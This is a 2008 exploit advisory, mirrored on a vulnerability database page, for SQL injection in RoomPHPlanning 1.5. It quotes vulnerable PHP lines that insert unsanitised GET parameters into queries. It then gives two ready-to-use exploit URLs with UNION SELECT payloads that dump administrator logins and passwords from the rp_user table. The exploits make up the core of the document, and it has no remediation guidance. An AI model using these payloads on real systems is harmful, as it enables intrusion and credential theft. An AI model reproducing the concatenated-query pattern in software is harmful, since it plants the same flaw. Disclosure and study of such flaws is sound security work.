Lucene search
K

roomphplanning15-sqlmulti.txt

🗓️ 27 May 2008 00:00:00Reported by hadihadiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

SQL Injection vulnerabilities found in RoomPHPlanning application affecting user data retrieval.

Code
` #######################################################################################  
# #  
# ...::::RoomPHPlanning 1.5 SQL Injection Vulnerabilities ::::... #   
#######################################################################################  
  
Virangar Security Team  
  
www.virangar.net  
www.virangar.ir  
  
--------  
Discoverd By :virangar security team(hadihadi)  
  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra  
  
& all virangar members & all hackerz  
  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal)  
-----  
  
-------vuln codes in:-----------  
resaopen.php:  
line 7:@$idresa = $_GET['idresa'];  
..  
..  
ine 102:$qry = "SELECT IdRm, R.IdUs, TitleRs,".  
"DateRs, BegRs, EndRs, DescRs,".  
"BillRs, NameUs ".  
"FROM ".RESA." R, ".USER." U ".  
"WHERE IdRs=".$idresa." ".  
"AND R.IdUs=U.IdUs";  
  
*********  
weekview.php:  
@$idroom = $_GET['idroom'];  
....  
line 47:$qry = "SELECT NameRm, BkcolRm, FtcolRm ".  
"FROM ".ROOM." WHERE IdRm=".$idroom ;  
---  
exploits:  
http://site.com/resaopen.php?idresa=-99999/**/union/**/select/**/1,2,3,4,5,6,concat(LoginUs,0x3a,char(58),PwdUs),8,9/**/from/**/rp_user/**/where/**/IdRk=1/*  
http://site.com/weekview.php?idroom=-999/**/union/**/select/**/concat(LoginUs,0x3a,char(58),PwdUs),2,3/**/from/**/rp_user/**/where/**/IdRk=1/*  
---  
young iranian h4ck3rz  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation